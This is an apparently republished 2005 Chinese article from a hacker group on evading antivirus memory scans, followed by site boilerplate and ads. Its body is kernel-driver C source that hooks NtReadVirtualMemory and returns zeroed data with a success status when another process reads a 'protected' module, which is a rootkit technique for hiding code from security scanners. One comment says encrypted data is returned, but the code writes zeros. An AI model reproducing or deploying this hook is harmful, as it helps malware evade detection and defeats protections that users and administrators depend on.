對抗殺毒軟體的記憶體掃描

來源:互聯網
上載者:User

Author: Polymorphours

Email: Polymorphours@whitecell.org

Homepage:http://www.whitecell.org

Date: 2005-11-17

/*++ Author: PolymorphoursDate: 2005/1/10通過對 NtReadVirtualMemory 掛鈎,防止其他進程對保護的模組進行掃描,如果發現其他進程讀被保護模組的記憶體,則返回0--*/typedef struct _LDR_DATA_TABLE_ENTRY {LIST_ENTRY InLoadOrderLinks;LIST_ENTRY InMemoryOrderLinks;LIST_ENTRY InInitializationOrderLinks;PVOID DllBase;PVOID EntryPoint;ULONG SizeOfImage;UNICODE_STRING FullDllName;UNICODE_STRING BaseDllName;/*+0x034 Flags : Uint4B+0x038 LoadCount : Uint2B+0x03a TlsIndex : Uint2B+0x03c HashLinks : _LIST_ENTRY+0x03c SectionPointer : Ptr32 Void+0x040 CheckSum : Uint4B+0x044 TimeDateStamp : Uint4B+0x044 LoadedImports : Ptr32 Void+0x048 EntryPointActivationContext : Ptr32 Void+0x04c PatchInformation : Ptr32 Void*/} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;/*++函數名: MyNtReadVirtualMemory參數:INHANDLEProcessHandle,INPVOIDBaseAddress,OUTPVOIDBuffer,INULONGBufferLength,OUTPULONGReturnLengthOPTIONAL功能:隱藏保護模組的記憶體,如果發現有記憶體掃描到這塊記憶體,則返回加密後的資料擾亂掃描過程返回:NTSTATUS--*/NTSTATUSMyNtReadVirtualMemory(INHANDLEProcessHandle,INPVOIDBaseAddress,OUTPVOIDBuffer,INULONGBufferLength,OUTPULONGReturnLengthOPTIONAL){NTSTATUSstatus;PEPROCESSeProcess;PVOIDPeb;PPEB_LDR_DATAPebLdrData;PLDR_DATA_TABLE_ENTRYLdrDataTableHeadList;PLDR_DATA_TABLE_ENTRYLdrDataTableEntry;PLIST_ENTRYBlink;PPROTECT_NODEFileNode = NULL;BOOLEANbHideFlag = FALSE;ULONGImageMaxAddress = 0;/*#ifdef _DEBUGDbgPrint( "Call Process: %s, BaseAddress: %08x\n", PsGetProcessImageFileName(

PsGetCurrentProcess() ), BaseAddress );#endif*/status =ObReferenceObjectByHandle(ProcessHandle,FILE_READ_DATA,PsProcessType,KernelMode,(PVOID)&eProcess,NULL);if ( NT_SUCCESS(status) ) {//// 得到PEB的地址//Peb = (PVOID)(*(PULONG)((PCHAR)eProcess + PebOffset));//// 切換到目標進程空間//KeAttachProcess( eProcess );//// 判斷PEB是否有效,如果有效,那麼準備利用PEB結構遍曆進程載入的模組//if ( !MmIsAddressValid( Peb ) ) {/*#ifdef _DEBUGDbgPrint( "PEB is error.\n" );#endif*/KeDetachProcess();ObDereferenceObject( eProcess );goto CLEANUP;}PebLdrData = (PPEB_LDR_DATA)(*(PULONG)( (PCHAR)Peb + 0xc ));if ( !PebLdrData ) {KeDetachProcess();ObDereferenceObject( eProcess );goto CLEANUP;}try {ProbeForRead ( PebLdrData,sizeof(PEB_LDR_DATA),sizeof(ULONG));//// 遍曆模組鏈表//LdrDataTableHeadList = (PLDR_DATA_TABLE_ENTRY)PebLdrData

->InLoadOrderModuleList.Flink;LdrDataTableEntry = LdrDataTableHeadList;do {ProbeForRead(LdrDataTableEntry,sizeof(LDR_DATA_TABLE_ENTRY),sizeof(ULONG));if ( !LdrDataTableEntry->DllBase ) {LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry

->InLoadOrderLinks.Flink;continue;}//// 判斷讀的記憶體屬於那一個模組,如果都不屬於,那麼放過//ImageMaxAddress = (ULONG)((ULONG)LdrDataTableEntry->DllBase +

LdrDataTableEntry->SizeOfImage);if ( (ULONG)( (ULONG)BaseAddress + BufferLength) <

(ULONG)LdrDataTableEntry->DllBase || (ULONG)BaseAddress > ImageMaxAddress ) { // // 如果不是讀模組地區,那麼枚舉下一個 //LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->

InLoadOrderLinks.Flink;continue;}//// 如果是被保護的模組,那麼返回虛假資料//bHideFlag = FALSE;Blink = ProtectFile.Blink;while ( Blink != &ProtectFile ) {FileNode = CONTAINING_RECORD( Blink, PROTECT_NODE, ActiveLink );//// 如果發現當前檔案存在於隱藏列表,那麼設定隱藏標誌隱藏它//if ( wcsstr( FileNode->ProtectName, Ldr

DataTableEntry->FullDllName.Buffer ) ) {bHideFlag = TRUE;break;}Blink = Blink->Blink;}if ( bHideFlag ) {//// 返回原本的進程空間進行處理//KeDetachProcess();ObDereferenceObject( eProcess );ProbeForWrite(Buffer,BufferLength,sizeof(ULONG));memset( Buffer, 0x00, BufferLength );ProbeForWrite(ReturnLength,sizeof(PULONG),sizeof(ULONG));*ReturnLength = BufferLength;return STATUS_SUCCESS;}LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry

->InLoadOrderLinks.Flink;} while ( LdrDataTableEntry != LdrDataTableHeadList );} except( EXCEPTION_EXECUTE_HANDLER ) {if ( !bHideFlag ) {KeDetachProcess();ObDereferenceObject( eProcess );}goto CLEANUP;}KeDetachProcess();ObDereferenceObject( eProcess );}CLEANUP:return NtReadVirtualMemory(ProcessHandle,BaseAddress,Buffer,BufferLength,ReturnLength);}

WSS(Whitecell Security Systems),一個非營利性民間技術組織,致力於各種系統安全技術的研究。堅持傳統的hacker精神,追求技術的精純。

WSS 首頁:http://www.whitecell.org/

WSS 論壇:http://www.whitecell.org/forums/

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.